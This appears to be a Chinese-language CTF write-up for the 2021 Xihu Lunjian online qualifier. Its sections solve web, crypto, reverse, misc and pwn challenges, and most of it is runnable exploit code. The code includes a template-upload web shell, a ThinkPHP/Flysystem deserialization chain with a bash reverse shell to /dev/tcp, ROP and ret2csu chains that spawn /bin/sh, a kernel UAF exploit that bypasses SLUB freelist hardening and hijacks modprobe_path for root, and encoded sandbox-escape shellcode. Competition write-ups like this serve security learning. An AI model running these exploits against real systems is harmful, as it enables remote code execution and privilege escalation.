Contents
2021 西湖论剑 线上初赛 WP
web
web2
import requests
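def test(payload, url="http://d4355a12-beba-42f3-ba5a-ca434c20da40.ezupload-ctf.dasctf.com:2333"):
    """Upload `payload` as `index.latte`, then GET `/` and print both responses.

    The upload is a multipart field named `file`; the follow-up GET is what
    (presumably) makes the server render the uploaded Latte template and show
    its output.

    Args:
        payload: template source to upload.
        url: base URL of the target.  Defaults to the challenge instance so the
            original one-argument calls keep working; pass another URL to reuse
            this against a different instance.
    """
    files = {'file': ("index.latte", payload)}
    # To inspect the traffic, add proxies={"http": "127.0.0.1:8080"} (Burp).
    resp = requests.post(url, files=files)
    print(resp.text)
    resp = requests.get(url)
    print(resp.text)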
# Stage 1: plant the template.  `system` and its argument are separated by a
# `//` line comment and a newline -- presumably to get past a pattern filter on
# the upload -- while Latte still compiles the expression to system($_POST["cmd"]).
payload = """{=system//
($_POST["cmd"])}"""
test(payload)

# Stage 2: with index.latte in place, every POST carrying `cmd` runs that
# command on the server; read the flag.
url = "http://d4355a12-beba-42f3-ba5a-ca434c20da40.ezupload-ctf.dasctf.com:2333"
data = dict(cmd="cat /flag")
r = requests.post(url, data=data)
print(r.text)
web3


web4
用 `////` 绕过 parse_url
<?php
namespace League\Flysystem\Cached\Storage {
// Gadget 1: Flysystem's cached-adapter base class.  $complete is the value that
// ends up being handed to the cache store's serializer; with the Driver options
// further down that serializer is system(), so the backticked command inside
// $complete is what actually runs.  Replace `ip` with your listener address.
// (autosave=false is, in upstream Flysystem, what makes __destruct() call save();
// confirm against the target's version.)
abstract class AbstractCache {
protected $autosave = false;
protected $complete = "`bash -c 'exec bash -i &>/dev/tcp/ip/3333 <&1'`";
// protected $complete = "\"&whoami&" ;
// Backticks do nothing on a Windows target; chain the command with & instead.
}
}
namespace think\filesystem {
use League\Flysystem\Cached\Storage\AbstractCache;
// Gadget 2: ThinkPHP's CacheStore is the object that gets serialized (the chain's
// outer layer).  $store is the think\cache driver whose set()/serialize path we
// want to reach; $key only has to be a non-empty cache key.
class CacheStore extends AbstractCache {
protected $key = "1";
protected $store;
// $store is injected here so the generator at the bottom can plug in the File driver.
public function __construct($store="") {
$this->store = $store;
}
}
}
namespace think\cache {
// Gadget 3: the cache driver's options.  "serialize" names the callable the
// driver uses to serialize a value before storing it -- here system(), so the
// value being cached is executed as a shell command.  The other keys are only
// there so the driver's set() path does not bail out early on a missing option
// (presumably; confirm against the target's Driver::set()).
abstract class Driver {
protected $options = ["serialize"=>["system"],"expire"=>1,"prefix"=>"1","hash_type"=>"sha256","cache_subdir"=>"1","path"=>"1"];
}
}
namespace think\cache\driver {
use think\cache\Driver;
// Concrete driver class so the payload unserializes to a real, instantiable type
// on the target; it adds nothing beyond the options inherited from Driver.
class File extends Driver{}
}
namespace {
    // Assemble the chain bottom-up -- a File driver whose "serialize" option is
    // system(), wrapped in the CacheStore that gets serialized -- and print it
    // URL-encoded, ready to drop into the vulnerable parameter.
    $store = new think\cache\driver\File();
    $chain = new think\filesystem\CacheStore($store);
    echo urlencode(serialize($chain));
}
?>
反弹shell即可

cry
hardrsa
from gmpy2 import *
from Crypto.Util.number import getPrime, long_to_bytes
import sympy
# hardrsa: challenge parameters as given.  Only c, dp and p are used in the final
# step below; e, g, y, c1, pd and x are kept for reference -- they presumably fed
# the intermediate steps that recovered p, which this snippet does not show.
e = 0x10001
g = 2
y = 449703347709287328982446812318870158230369688625894307953604074502413258045265502496365998383562119915565080518077360839705004058211784369656486678307007348691991136610142919372779782779111507129101110674559235388392082113417306002050124215904803026894400155194275424834577942500150410440057660679460918645357376095613079720172148302097893734034788458122333816759162605888879531594217661921547293164281934920669935417080156833072528358511807757748554348615957977663784762124746554638152693469580761002437793837094101338408017407251986116589240523625340964025531357446706263871843489143068620501020284421781243879675292060268876353250854369189182926055204229002568224846436918153245720514450234433170717311083868591477186061896282790880850797471658321324127334704438430354844770131980049668516350774939625369909869906362174015628078258039638111064842324979997867746404806457329528690722757322373158670827203350590809390932986616805533168714686834174965211242863201076482127152571774960580915318022303418111346406295217571564155573765371519749325922145875128395909112254242027512400564855444101325427710643212690768272048881411988830011985059218048684311349415764441760364762942692722834850287985399559042457470942580456516395188637916303814055777357738894264037988945951468416861647204658893837753361851667573185920779272635885127149348845064478121843462789367112698673780005436144393573832498203659056909233757206537514290993810628872250841862059672570704733990716282248839
dp = 379476973158146550831004952747643994439940435656483772269013081580532539640189020020958796514224150837680366977747272291881285391919167077726836326564473
c = 57248258945927387673579467348106118747034381190703777861409527336272914559699490353325906672956273559867941402281438670652710909532261303394045079629146156340801932254839021574139943933451924062888426726353230757284582863993227592703323133265180414382062132580526658205716218046366247653881764658891315592607194355733209493239611216193118424602510964102026998674323685134796018596817393268106583737153516632969041693280725297929277751136040546830230533898514659714717213371619853137272515967067008805521051613107141555788516894223654851277785393355178114230929014037436770678131148140398384394716456450269539065009396311996040422853740049508500540281488171285233445744799680022307180452210793913614131646875949698079917313572873073033804639877699884489290120302696697425
c1 = 78100131461872285613426244322737502147219485108799130975202429638042859488136933783498210914335741940761656137516033926418975363734194661031678516857040723532055448695928820624094400481464950181126638456234669814982411270985650209245687765595483738876975572521276963149542659187680075917322308512163904423297381635532771690434016589132876171283596320435623376283425228536157726781524870348614983116408815088257609788517986810622505961538812889953185684256469540369809863103948326444090715161351198229163190130903661874631020304481842715086104243998808382859633753938512915886223513449238733721777977175430329717970940440862059204518224126792822912141479260791232312544748301412636222498841676742208390622353022668320809201312724936862167350709823581870722831329406359010293121019764160016316259432749291142448874259446854582307626758650151607770478334719317941727680935243820313144829826081955539778570565232935463201135110049861204432285060029237229518297291679114165265808862862827211193711159152992427133176177796045981572758903474465179346029811563765283254777813433339892058322013228964103304946743888213068397672540863260883314665492088793554775674610994639537263588276076992907735153702002001005383321442974097626786699895993544581572457476437853778794888945238622869401634353220344790419326516836146140706852577748364903349138246106379954647002557091131475669295997196484548199507335421499556985949139162639560622973283109342746186994609598854386966520638338999059
pd = 24869782389865450501811571588222344463610376331618976983194310327543361050399067805113576647152708173449058210620622984193023800730206452772983672334055867000
x = 43776275628859890575232443794319298551934804213472744927022818696759188901977390266973172755658396197421139420206549889337117978597883154859965236605452518446448639813055134133587564045471804447818058571586426895800984805588363855865218690877547419152765512143095217413477343835473963637692441032136163289964756172316289469159500312630529091350636808491697553069388388303341623047737553556123142002737059936569931163197364571478509576816349348146215101250803826590694039096063858424405382950769415272111843039715632655831594224288099608827345377164375927559338153505991404973888594356664393487249819589915881178770048740
p = 12131601165788024635030034921084070470053842112984866821070395281728468805072716002494427632757418621194662541766157553264889658892783635499016425528807741
# Final step: taking dp to be d mod (p-1) (the RSA-CRT exponent, as the name
# suggests), pow(c, dp, p) == m mod p.  This recovers m exactly only while
# m < p, which is the case for this challenge's short plaintext.
print(long_to_bytes(pow(c,dp,p)))
数独

re
ROR
输入40个字节,然后加密后比较。
八个字节一组加密,直接用 z3 或者 angr 都能解出。
虚假的粉丝。
输入三个参数,一个是文件的序号,读取的起始位置和读取字节数。

然后 key 是 11 个字节,开头 A 结尾 R,只能脑洞猜 key(无语):Alan Walker。
最后猜出正确变体:Al4N_wAlK3R
解密得到字符画flag
misc
misc3_yusa的小秘密
ByteCTF 原题,直接拿之前的脚本处理图片,处理后的图片上有 flag。
from cv2 import cv2 as cv
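# LSB-plane extraction: convert to YCrCb and write each channel's least
# significant bit as a black/white image; the hidden picture shows up in one of
# the three planes.
img = cv.imread('ps')
if img is None:
    # cv.imread returns None (no exception) when the file is missing or not an
    # image; stop here instead of failing inside cvtColor with an opaque error.
    raise SystemExit("could not read image 'ps'")
src = cv.cvtColor(img, cv.COLOR_BGR2YCrCb)
Y, Cr, Cb = cv.split(src)
# cv.split yields the channels in YCrCb order; (plane % 2) * 255 maps each LSB
# to 0/255 so it is visible as an image.
for name, plane in (('Y', Y), ('Cr', Cr), ('Cb', Cb)):
    cv.imwrite(name + '.png', (plane % 2) * 255)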
misc5_Yusa的秘密
volatility 分析:首先在桌面文件中发现了 sakura 相关的文件,同时发现用户名为 yusa,于是以 sakura 和 yusa 为关键词 dump 可能有用的文件,最后找到了许多,其中关键的有 mystery man.contact、yusa-didi、key.zip。
mystery man.contact 中有一段 base32,解码获得一段 base64,再解码获得一个 key,这个 key 用来解开 yusa-didi 这个压缩包,里面是一张 key.bmp。然后根据题目给的原附件 who i am 想到了用户密码,使用 mimikatz 插件获得 YusaYusa520。然后根据 yusa.contact 中备忘录的提示 dump 下来 stickynote 进程,在其中发现了 rtf 模板,保存下来获得 key.zip 的密码。key.zip 解压后是一个脚本:读取 key.bmp 里的像素作为异或 key 加密 flag,成了 who i am。写一个解密脚本解密,发现是张 GIF 图,最后分解 GIF 图在其中一帧上找到 flag。
pwn
pwn1_string_go
在 lative_fuc 中存在两个漏洞:第一个是输入的 size 可以是负数,导致可以直接向上溢出,从而泄漏 canary 和 libc 地址;其二是 memcpy 存在栈溢出,ROP 执行 system("/bin/sh")。
from pwn import *
# import pwnlib.asm as asm
# pwn1 harness: pwntools context, then the local-vs-remote target switch.
context.log_level = 'debug'
context.arch = 'amd64'
context.os = 'linux'
context.terminal = ['tmux', 'splitw', '-h']

# 1 = debug against the local binary and system libc; anything else = remote.
local = 1

if local == 1:
    p = process('./string_go')
    lb = ELF('/lib/x86_64-linux-gnu/libc.so.6')
else:
    p = remote('82.157.20.104', 56700)
    lb = ELF('libc-2.27.so')

# Gadget bookkeeping shared by both modes; only `rdi` is actually filled in
# later in the script, the rest are unused placeholders.
rdi = rsi = rdx = rax = 0
syscall = 0
gadgets = []
def new(off, x1, x2):
    """Drive menu option 3 ("new"): send the offset, then the two strings.

    `off` is sent as-is; the binary does not reject a negative value, which is
    what the leak further down exploits.  `x1` and `x2` are passed straight to
    sendlineafter without conversion.
    """
    for item in ('3', str(off), x1, x2):
        p.sendlineafter('>>> ', item)
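# Stage 1: leak.  A negative offset makes "new" write above its own buffer, and
# what the program echoes back presumably includes the memory that sits there:
# a libc pointer and the stack canary.  All literals are bytes so this runs
# unchanged on Python 2 and 3 (the original mixed str and bytes).
new(-8, b'a' * 0xf, b'\xf0')
p.recvn(0x20)
# The first 0x7f-terminated run is a 6-byte little-endian libc pointer.
libc_addr = u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
# 0x98e200 is that pointer's distance from the libc base on the remote libc
# (libc-2.27.so); recompute it when running against another build.
libc = libc_addr - 0x98e200
p.recvn(18)
canary = u64(p.recvn(8))
print('canary = %#x' % canary)
print('libc: %#x' % libc)
p.recvuntil(b'>>> ')

# Stage 2: memcpy stack overflow -> ret2libc.  Offsets are for the same libc.
ret_addr = libc + 0xc0c9d  # presumably a bare `ret`, realigns rsp for system()
rdi = libc + 0x215bf       # pop rdi ; ret
payload = b'a' * 0x18 + p64(canary) + b'a' * 0x18 + p64(ret_addr) + p64(rdi)
payload += p64(libc + next(lb.search(b'/bin/sh\x00'))) + p64(libc + lb.sym['system'])
p.sendline(payload)
p.interactive()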
pwn2_blind
这题是栈溢出,因为 GOT 表可写且没开 PIE,直接利用 csu 布置参数,把 alarm 的 GOT 表项低字节改成指向 alarm 内部 syscall 指令的值(具体字节需要爆破),然后通过该 syscall 执行 execve("/bin/sh", 0, 0)。
from signal import alarm
from pwn import *
# import pwnlib.asm as asm
# pwn2 harness: pwntools context, target switch, then the addresses the chain needs.
context.log_level = 'debug'
context.arch = 'amd64'
context.os = 'linux'
context.terminal = ['tmux', 'splitw', '-h']

local = 0
elf = ELF("./blind")

if local == 1:
    lb = ELF('/lib/x86_64-linux-gnu/libc.so.6')
    # Local runs go through gdb with the breakpoint used while developing.
    p = gdb.debug('./blind', 'b *0x40074C')
else:
    p = remote('82.157.6.165', 51000)

# Placeholders, not used by this exploit.
rdi = rsi = rdx = rax = 0
syscall = 0
gadgets = []

exid = 0x3b            # SYS_execve on x86-64; also the length of the final send
ap = 0x400560          # not used below
ag = elf.got['alarm']  # GOT slot whose low byte gets repointed at a syscall insn
rg = elf.got['read']
bss = elf.bss()        # scratch area that receives "/bin/sh"
def csu(func_got, arg0, arg1, arg2):
    """Return one ret2csu call: the pop-tail of __libc_csu_init, then its call stub.

    Stack consumed by the gadget at csu1+4 (conventionally pop rbx/rbp/r12..r15;
    ret): rbx=0 (array index), rbp=1 (so the loop exits after one call),
    r12=func_got (the GOT slot that gets *called*), then arg0/arg1/arg2.
    Judging from how it is used below -- read(0, alarm@got, 1) is written as
    csu(rg, 1, ag, 0) -- the mapping is arg0->rdx, arg1->rsi, arg2->edi, i.e.
    this binary's stub is the `mov rdx,r13; mov rsi,r14; mov edi,r15d;
    call [r12+rbx*8]` variant; confirm in the disassembly before reusing.
    The caller must follow each call with 7 qwords of padding for the
    add rsp,8 + six pops that run after the call returns.
    """
    csu1 = 0x4007B6
    csu2 = 0x4007A0
    words = [csu1 + 4, 0, 1, func_got, arg0, arg1, arg2, csu2]
    return b''.join(p64(w) for w in words)
# One 0x500-byte overflow carrying three chained ret2csu calls.  Each call is
# followed by 7 zero qwords to absorb the add rsp,8 + six pops of the stub.
chain = [
    csu(rg, 1, ag, 0),       # read(0, alarm@got, 1): one byte into alarm's GOT slot
    b'\x00' * 8 * 7,
    csu(rg, 0x100, bss, 0),  # read(0, bss, 0x100): "/bin/sh" in, rax = bytes read
    b'\x00' * 8 * 7,
    csu(ag, 0, 0, bss),      # call the patched slot: syscall(rax=0x3b, bss, 0, 0)
]
pay = b'a' * 0x58 + b''.join(chain)
p.send(pay.ljust(0x500, b'\x01'))

# Low byte that turns alarm@got into the address of the `syscall` instruction
# inside alarm.  It depends on the remote libc build, which is why the writeup
# says this needs brute force: 0xd5 is the value that worked here; on a miss
# the process dies and you reconnect with the next candidate.
p.send(p8(0xd5))
# Exactly 0x3b bytes, so read() returns 0x3b == SYS_execve in rax.
p.send(b'/bin/sh'.ljust(exid, b'\x00'))
p.interactive()
pwn3_easykernel
show 中存在溢出读,通过读写堆上的残留内容获得 kernel 地址,绕过 KASLR。其堆的释放没有清空指针,导致存在 UAF;参考其保护机制:
/* Linux SLUB (mm/slub.c): with CONFIG_SLAB_FREELIST_HARDENED the "next" pointer
 * kept inside a free object is stored as
 *     ptr ^ s->random ^ swab(address of the slot holding it)
 * so an attacker who can read/write a freed object still needs the per-cache
 * s->random and the slot's own address before a forged pointer decodes to a
 * useful target.  The exploit below recovers both (its `secret` and heap_addr
 * values) and then writes modprobe_path into a freed slot's next field. */
static inline void *freelist_ptr(const struct kmem_cache *s, void *ptr,
unsigned long ptr_addr)
{
#ifdef CONFIG_SLAB_FREELIST_HARDENED
/*
 * When CONFIG_KASAN_SW_TAGS is enabled, ptr_addr might be tagged.
 * Normally, this doesn't cause any issues, as both set_freepointer()
 * and get_freepointer() are called with a pointer with the same tag.
 * However, there are some issues with CONFIG_SLUB_DEBUG code. For
 * example, when __free_slub() iterates over objects in a cache, it
 * passes untagged pointers to check_object(). check_object() in turns
 * calls get_freepointer() with an untagged pointer, which causes the
 * freepointer to be restored incorrectly.
 */
return (void *)((unsigned long)ptr ^ s->random ^
swab((unsigned long)kasan_reset_tag((void *)ptr_addr)));
#else
/* Without the hardening option the pointer is stored in the clear. */
return ptr;
#endif
}
修改fd指针,指向modprobe_path实现提权。
#include <fcntl.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/ioctl.h>
#include <sys/types.h>
#include <unistd.h>
/*
* HEX: show number in hex
* LOG: show msg in specific format
 * show: dump `size` 8-byte words at addr in hex, two per row
*/
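/* HEX: print a value as a zero-padded 64-bit hex number.  The argument is
 * parenthesised so HEX(a + b) casts the sum rather than just `a`. */
#define HEX(x) printf("[*]0x%016lx\n", (size_t)(x))
/* LOG: print one message line with the [*] prefix. */
#define LOG(addr) printf("[*]%s\n", addr)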
/* Hex-dump `size` 8-byte words starting at `addr`: two words per row, each row
 * prefixed with its byte offset.  An odd trailing word is printed with a zero
 * filler in the second column. */
void show(u_int64_t *addr, int size)
{
    int row;
    int rows = size / 2;

    puts("--------------------------------------------");
    for (row = 0; row < rows; row++)
    {
        printf("0x%04lx ", (size_t)row * 0x10);
        printf("0x%016lx 0x%016lx\n", (size_t)addr[2 * row], (size_t)addr[2 * row + 1]);
    }
    if (size & 1)
    {
        printf("0x%04lx ", (size_t)rows * 0x10);
        printf("0x%016lx 0x%016lx\n", (size_t)addr[size - 1], 0ul);
    }
    puts("--------------------------------------------");
}
/* Handle to the challenge device (/dev/kerpwn), opened in main(). */
int fd;
/* Argument block shared by every ioctl command.  idx is 4 bytes, so on x86-64
 * the compiler pads and `size` lands at offset 8 -- new() relies on that when
 * it passes &t.size instead of &t. */
struct node
{
u_int32_t idx;   /* slot number */
u_int64_t size;  /* byte count for show / edit / add */
void *data;      /* user buffer the driver copies to or from */
};
/* ioctl 0x40, "show": copy `size` bytes of slot `idx` out to `data`.  Per the
 * writeup the driver does not bound `size` by the slot's real length, which is
 * the overflow read main() uses to pull neighbouring heap contents. */
void sw(int idx, size_t size, void *data)
{
    struct node req;

    req.idx = idx;
    req.size = size;
    req.data = data;
    ioctl(fd, 0x40, &req);
}
/* ioctl 0x50, "edit": overwrite `size` bytes of slot `idx` with `data`.
 * main() calls this on an already freed slot to plant a forged freelist pointer. */
void edit(int idx, int size, void *data)
{
    struct node req;

    req.idx = idx;
    req.size = size;
    req.data = data;
    ioctl(fd, 0x50, &req);
}
/* ioctl 0x30, "delete": free slot `idx`.  Per the writeup the driver leaves its
 * pointer behind, so show()/edit() on the same idx afterwards touch freed memory
 * -- the UAF the exploit is built on. */
void dlt(int idx)
{
    struct node req = {0};

    req.idx = idx;
    ioctl(fd, 0x30, &req);
}
/* ioctl 0x20, "add": allocate a slot of `size` bytes and fill it from `data`.
 * The pointer handed over is &t.size, not &t: the add command presumably takes
 * a {size, data} pair without the idx field (confirm against the driver). */
void new(int size, void *data)
{
    struct node t;

    t.idx = 0;
    t.size = size;
    t.data = data;
    ioctl(fd, 0x20, &t.size);
}
#define __u64 u_int64_t
/* Userland copy of the kernel's swab64(): reverse all eight bytes of a 64-bit
 * value.  Needed to mirror freelist_ptr() above, which mixes swab(slot address)
 * into every stored freelist pointer. */
#define swab64(x) ((__u64)((((__u64)(x) & (__u64)0x00000000000000ffULL) << 56) | \
(((__u64)(x) & (__u64)0x000000000000ff00ULL) << 40) | \
(((__u64)(x) & (__u64)0x0000000000ff0000ULL) << 24) | \
(((__u64)(x) & (__u64)0x00000000ff000000ULL) << 8) | \
(((__u64)(x) & (__u64)0x000000ff00000000ULL) >> 8) | \
(((__u64)(x) & (__u64)0x0000ff0000000000ULL) >> 24) | \
(((__u64)(x) & (__u64)0x00ff000000000000ULL) >> 40) | \
(((__u64)(x) & (__u64)0xff00000000000000ULL) >> 56)))
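/* easykernel exploit: leak the kernel base through the over-read in "show",
 * recover SLUB's freelist cookie through the UAF, point a freed slot's next
 * pointer at modprobe_path and overwrite it with a script of ours, then trigger
 * modprobe by executing a file with an unknown magic.
 *
 * Fixes vs. the original listing: the allocation helper is new() (the listing
 * called an undefined add()), uint64_t values are printed with a matching
 * format instead of %llx, the sources passed to new() are really `size` bytes
 * long, and the two places that could silently proceed with garbage (no
 * kernel pointer found, no cookie found) now abort instead. */
int main(int argc, char const *argv[])
{
    int i, j;
    uint64_t xored_cookie = 0, heap_addr[26], temp, secret;
    /* new() asks the driver to copy 0x10 bytes, so the sources must be at least
     * that long; a bare "abcd" literal is only 5 bytes. */
    char fill[0x10] = "abcd";
    char path[0x10] = "/tmp/c";

    fd = open("/dev/kerpwn", O_RDWR);
    if (fd == -1)
    {
        perror("[-]dev open:");
        exit(-1);
    }
    LOG("open success!");

    unsigned char *buf = malloc(0x10000);
    if (!buf)
    {
        perror("[-]malloc:");
        exit(-1);
    }
    memset(buf, 'A', 0x1000);

    /* Step 1: KASLR leak.  Slot 0 is a 0x10-byte object, but show() lets us read
     * 0x100 bytes from it; the memory after it still holds kernel text pointers
     * (0xffffffff........). */
    LOG("leak the kalsr");
    new(0x10, buf);
    memset(buf, 0, 0x200);
    sw(0, 0x100, buf);
    show((u_int64_t *)buf, 0x100 / 8);

    size_t *p = (size_t *)buf;
    size_t kbase = 0;
    for (i = 0; i < 0x10; i++)
    {
        if ((p[i] >> 32) == 0xffffffffLL)
        {
            /* 0x10f1fa0: distance of that pointer from the kernel base on the
             * challenge kernel; it does not carry over to another build. */
            kbase = p[i] - 0x10f1fa0;
            break;
        }
    }
    LOG("kernel base:");
    HEX(kbase);
    if (!kbase)
    {
        LOG("no kernel pointer in the leak, giving up");
        exit(-1);
    }

    /* Step 2: forge a freelist pointer.  With CONFIG_SLAB_FREELIST_HARDENED the
     * stored next pointer is  next ^ s->random ^ swab64(&slot)  (see
     * freelist_ptr() above), so we need s->random and the slot addresses. */
    LOG("change modprobe path!");
    getchar();
    /* modprobe_path offset on the challenge kernel; environment-specific. */
    size_t mp = kbase + 0x1663c00;
    LOG("modprobe path");
    HEX(mp);

    /* Allocate slots 1..25 and free them all.  delete() leaves the driver's
     * pointers in place, so show()/edit() keep working on the freed objects. */
    for (i = 0; i < 25; i++)
        new(0x10, fill); /* slots 1-25 */
    for (i = 1; i <= 25; i++)
        dlt(i);

    /* Scan the freed objects for the obfuscated pointer whose low 16 bits are
     * 0xb8af.  That marker was observed on the target (presumably the entry
     * whose `next` is NULL, i.e. s->random ^ swab64(&slot) on its own); it has
     * to be re-derived for any other kernel. */
    for (i = 1; i <= 25; i++)
    {
        sw(i, 0x100, buf);
        for (j = 0; j < 0x100; j += 8)
        {
            uint64_t word = *(uint64_t *)(buf + j);
            if ((word & 0xffff) == 0xb8af)
                xored_cookie = word;
        }
    }
    if (xored_cookie)
        printf("success:%lx\n", (unsigned long)xored_cookie);
    else
    {
        LOG("freelist cookie not found, giving up");
        exit(-1);
    }

    /* The exploit treats the word at offset 8 of each 16-byte object as the
     * freelist pointer (presumably where this kernel's SLUB keeps it for this
     * size).  Assuming a LIFO freelist, slot 2's next is slot 1 and slot 3's
     * next is slot 2; XOR with the cookie yields their low 48 bits and the
     * canonical top 16 bits are restored by hand. */
    sw(2, 16, buf);
    heap_addr[1] = (xored_cookie ^ *(uint64_t *)(buf + 8)) | 0xffff000000000000;
    printf("heap1 addr:0x%lx\n", (unsigned long)heap_addr[1]);
    temp = *(uint64_t *)(buf + 8);
    sw(3, 16, buf);
    heap_addr[2] = (xored_cookie ^ *(uint64_t *)(buf + 8)) | 0xffff000000000000;
    printf("heap2 addr:0x%lx\n", (unsigned long)heap_addr[2]);
    /* temp == addr1 ^ random ^ swab64(addr2), so this isolates s->random. */
    secret = heap_addr[1] ^ swab64(heap_addr[2]) ^ temp;
    printf("secret:0x%lx\n", (unsigned long)secret);

    /* Slot 25 was freed last, so it heads the list and its next is slot 24.
     * Rewrite slot 24's next so the third allocation below returns
     * modprobe_path itself. */
    sw(25, 16, buf);
    heap_addr[24] = (xored_cookie ^ *(uint64_t *)(buf + 8)) | 0xffff000000000000;
    printf("heap24 addr:0x%lx\n", (unsigned long)heap_addr[24]);
    sw(24, 8, buf); /* keep slot 24's first 8 bytes unchanged */
    *(uint64_t *)(buf + 8) = mp ^ swab64(heap_addr[24]) ^ secret;
    printf("attempt:%lx\n", (unsigned long)*(uint64_t *)(buf + 8));
    edit(24, 16, buf);

    /* Step 3: walk the freelist -- slot 25, slot 24, then modprobe_path. */
    new(0x10, fill);
    new(0x10, fill);
    new(0x10, path); /* modprobe_path = "/tmp/c" */

    /* Step 4: run a file with an unknown binary format; the kernel invokes
     * modprobe_path (our script) as root, which copies the flag out. */
    system("echo -ne '#!/bin/sh\n/bin/cp /flag /tmp/flag\n/bin/chmod 777 /tmp/flag' > /tmp/c");
    system("chmod +x /tmp/c");
    system("echo -ne '\\xff\\xff\\xff\\xff' > /tmp/dummy");
    system("chmod +x /tmp/dummy");
    system("/tmp/dummy");
    system("cat /tmp/flag");
    return 0;
}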
pwn4_code_project
程序开始时将 flag 写入随机地址,并开启沙箱禁用了常用的读写和命令执行系统调用,但并未禁用 writev,仍可以通过它完成输出;同时程序只允许用可见字符编写 shellcode。这里直接利用 alpha3 工具进行编码。
# pwn4 shellcode before encoding, kept as a reference listing.  rax/rdi/rdx/rsi
# are real x86-64 registers; `r4`/`r7` are not valid mnemonics and presumably
# stand for two scratch registers picked when this was assembled.
#
# Idea: the flag lives at a random address and the sandbox blocks the usual
# syscalls but not writev (0x14 on x86-64).  The loop walks memory one page at
# a time (r7 << 12) and calls writev(1, &iov, 1) with iov = {page, 0x30} built
# on the stack (push 0x30, push r4, rsi = rsp).  An unmapped page presumably
# just makes writev fail (-EFAULT) rather than kill the process, so the loop
# keeps going and every mapped page -- the flag's included -- ends up on stdout.
'''
xor r7, r7
loop:
mov r4, r7
sal r4, 12
push 0x14
pop rax
push 1
pop rdi
push 1
pop rdx
push 0x30
push r4
mov rsi, rsp
syscall
inc r7
jmp loop
'''
from pwn import *
import inspect
from sys import argv
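def leak(var):
    """Log `var` as hex under the name it carries in the caller's scope.

    Scans the caller's locals for an object that *is* `var`.  If nothing
    matches (the value was passed as an expression or temporary) a generic
    label is used instead of raising IndexError, as the original did.
    """
    callers_local_vars = inspect.currentframe().f_back.f_locals.items()
    names = [var_name for var_name, var_val in callers_local_vars if var_val is var]
    temp = names[0] if names else 'leak'
    p.info(temp + ': {:#x}'.format(var))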
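local_libc = '/lib/x86_64-linux-gnu/libc.so.6'
local_libc_32 = '/lib/i386-linux-gnu/libc.so.6'
remote_libc = ''
binary = './code_project'
context.binary = binary
elf = ELF(binary, checksec=False)

# Pick the target once: `python exp.py r` attacks the remote instance, anything
# else runs the binary locally.  The original started a local process and then
# replaced it with the remote connection, leaving the process running.
if len(argv) > 1 and argv[1] == 'r':
    p = remote('82.157.31.181', 42400)
else:
    p = process(binary)
libc = elf.libc

# gdb command kept from development; not used here.
comm = ''
comm += 'b *0x400b16\n'

# Reference only: the straightforward open/read/write shellcode.  It is printed
# for comparison but never sent -- the binary only accepts printable bytes.
shellcode = shellcraft.open("flag")
shellcode += shellcraft.read(3, 0x601240, 0x30)
shellcode += shellcraft.write(1, 0x601240, 0x30)
print(shellcode)

# What actually goes over the wire: the alpha3-encoded (printable) shellcode,
# per the writeup the writev page-scan loop listed above.
shellcode = b'Rh0666TY1131Xh333311k13XjiV11Hc1ZXYf1TqIHf9kDqW02DqX0D1Hu3M10108O1L4y3V16404j082s2G2n1k070k0Z05000Z180s2E0z8N3D0a042B8O403K4I2Z0Z'
p.sendlineafter(b'Hints: DASCTF{MD5}', shellcode)
p.interactive()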